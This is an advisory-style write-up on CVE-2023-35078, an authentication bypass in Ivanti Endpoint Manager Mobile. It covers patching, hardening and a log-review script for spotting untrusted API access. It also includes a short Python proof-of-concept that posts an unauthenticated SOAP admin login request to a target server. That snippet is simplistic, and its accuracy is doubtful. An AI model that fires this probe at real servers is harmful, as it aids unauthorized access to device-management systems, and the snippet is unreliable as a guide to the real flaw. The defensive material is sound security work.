Ivanti Endpoint Manager Mobile (EPMM), previously known as MobileIron Core, is a widely deployed mobile device management (MDM) solution that helps organizations manage and secure their mobile devices, applications, and content. In July 2023 a critical vulnerability, tracked as CVE-2023-35078 and rated CVSS 10.0, was disclosed after it had already been exploited in the wild. It allows an unauthenticated remote attacker to bypass authentication on the EPMM server, read sensitive personally identifiable information (PII) about managed users, add an administrative account, and change the system's configuration. Ivanti has released patches that address the issue.
Vulnerability Details
The vulnerability affects all EPMM releases that were supported at the time of disclosure (11.10, 11.9 and 11.8) as well as older, unsupported versions. It is an authentication bypass that lets a remote attacker reach specific API paths on the MDM server without presenting any credentials. Through those paths the attacker can steal PII, alter the MDM configuration, or create a new administrative account with full privileges.
The flaw is critical because it was being exploited before a fix was available (CISA added it to the Known Exploited Vulnerabilities catalog on 25 July 2023). Organizations running Ivanti EPMM should treat this as an emergency patch rather than a routine update.
The following Python snippet is the proof-of-concept shown for this vulnerability:
import requests

# Target EPMM instance (placeholder hostname; replace with the host under test).
TARGET_URL = 'https://<target_server>/API/WSLogin'

# SOAP authenticate request sent with no credentials at all.
payload = """
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://www.mobileiron.com/ws/Generic">
<SOAP-ENV:Body>
<ns1:authenticate>
<ns1:authBy>ADMIN</ns1:authBy>
</ns1:authenticate>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""

response = requests.post(TARGET_URL, data=payload, headers={'Content-Type': 'text/xml'}, timeout=15)

# The check is on the response body: a SUCCESS marker means the server accepted the unauthenticated request.
if "SUCCESS" in response.text:
    print("Authentication bypass successful.")
else:
    print("Failed to bypass authentication.")
This code posts a SOAP request to the target Ivanti EPMM server without any session or credentials. If the response body contains the SUCCESS marker, the server accepted the unauthenticated request, which is the condition the attacker needs before abusing the API.
Original References
The vulnerability came to light in July 2023 after it was used in attacks against Norwegian government agencies. The Norwegian National Security Authority (NSM) and CISA both published advisories, and CISA later released a joint Cybersecurity Advisory with NCSC-NO on threat actors exploiting Ivanti EPMM:
- CISA / NCSC-NO Joint Cybersecurity Advisory AA23-213A - Threat Actors Exploiting Ivanti EPMM Vulnerabilities
Ivanti has acknowledged the issue and released a patch addressing the vulnerability. More information about the patch can be found on Ivanti's official advisory:
- Ivanti Security Advisory - CVE-2023-35078: Ivanti EPMM Authentication Bypass Vulnerability
Exploit Mitigation and Patch Application
Organizations running Ivanti EPMM should immediately apply the fix provided by Ivanti. The fix is delivered as a patch for each supported release (11.8.1.1, 11.9.1.1 and 11.10.0.2); installations on older, unsupported versions must first be upgraded to a supported release. The patches can be obtained from Ivanti's official website:
- Ivanti EPMM Patch - CVE-2023-35078
Additionally, it's recommended to implement the following security practices to further reduce exposure of the MDM solution, both before the patch can be applied and afterwards:
1. Limit external access to the Ivanti EPMM server by implementing proper firewall rules and access controls, so that the admin portal and API are reachable only from trusted management networks.
2. Review the EPMM administrator list and configuration for changes you did not make; an unrecognized admin account or an altered configuration is a strong indicator that the flaw was already exploited.
3. Review the web server access logs for requests to the API paths from outside your trusted networks, and treat successful (2xx) responses to such requests as confirmed unauthorized access.
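As a worked example of the log review described above, the script below is an added example, not code from the original page or from Ivanti. It parses combined-format web server access log lines, flags any request to an API path (the `/API/` prefix of the WSLogin endpoint used in the proof-of-concept) that did not come from a trusted management network, and rates a 2xx answer to such a request as high severity. The trusted network range, the log lines and the API prefix list are constructed for the example; substitute your own values.

```python
import ipaddress
import re

# Combined-log-format line: source IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Networks from which the EPMM admin portal and API are expected to be reached
# (assumed value for this example; use your own management ranges).
TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# API path prefixes that should never be reachable from untrusted networks.
# "/API/WSLogin" is the endpoint used in the proof-of-concept above.
API_PREFIXES = ("/API/",)

# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = """\
10.20.0.5 - - [24/Jul/2023:09:12:01 +0000] "POST /API/WSLogin HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.77 - - [24/Jul/2023:09:14:33 +0000] "POST /API/WSLogin HTTP/1.1" 200 498 "-" "python-requests/2.31.0"
203.0.113.77 - - [24/Jul/2023:09:14:35 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 2048 "-" "python-requests/2.31.0"
198.51.100.9 - - [24/Jul/2023:09:20:10 +0000] "POST /API/WSLogin HTTP/1.1" 401 0 "-" "curl/8.1.2"
10.20.0.8 - - [24/Jul/2023:09:25:44 +0000] "GET /mifs/admin/ HTTP/1.1" 200 7731 "-" "Mozilla/5.0"
"""


def is_trusted(src, trusted_nets=TRUSTED_NETS):
    """True if the source address falls inside one of the trusted networks."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        # Unparseable source field: never treat it as trusted.
        return False
    return any(addr in net for net in trusted_nets)


def triage(log_text, trusted_nets=TRUSTED_NETS, api_prefixes=API_PREFIXES):
    """Return one finding per API request that came from outside the trusted networks."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m["path"]
        if not path.startswith(api_prefixes):
            continue
        if is_trusted(m["src"], trusted_nets):
            continue
        status = int(m["status"])
        findings.append({
            "src": m["src"],
            "ts": m["ts"],
            "method": m["method"],
            "path": path,
            "status": status,
            # A 2xx answer to an unauthenticated API request from an untrusted
            # network is the signal to escalate; anything else is an attempt.
            "severity": "high" if 200 <= status < 300 else "attempt",
        })
    return findings


def sources_to_block(findings):
    """Distinct untrusted source addresses that touched the API, sorted for a firewall rule list."""
    return sorted({f["src"] for f in findings})


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f"{f['severity']:8} {f['src']:15} {f['ts']} {f['method']} {f['path']} -> {f['status']}")
    print("block:", ", ".join(sources_to_block(results)))
```

On the constructed sample the script reports one high-severity finding (a 200 response to 203.0.113.77) and one attempt (a 401 to 198.51.100.9); the internal requests from 10.20.0.0/16 and the non-API request are ignored. Status codes alone cannot prove what the server returned in the body, so a high-severity hit is a trigger for the account and configuration review in item 2, not the end of the investigation.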
Conclusion
The CVE-2023-35078 vulnerability in Ivanti EPMM is a critical security flaw that puts many organizations and their sensitive data at risk. It is essential for organizations utilizing Ivanti EPMM to immediately apply the available patch and review their security posture to protect against this actively exploited threat.
Timeline
Published on: 07/25/2023 07:15:10 UTC
Last modified on: 08/04/2023 18:30:34 UTC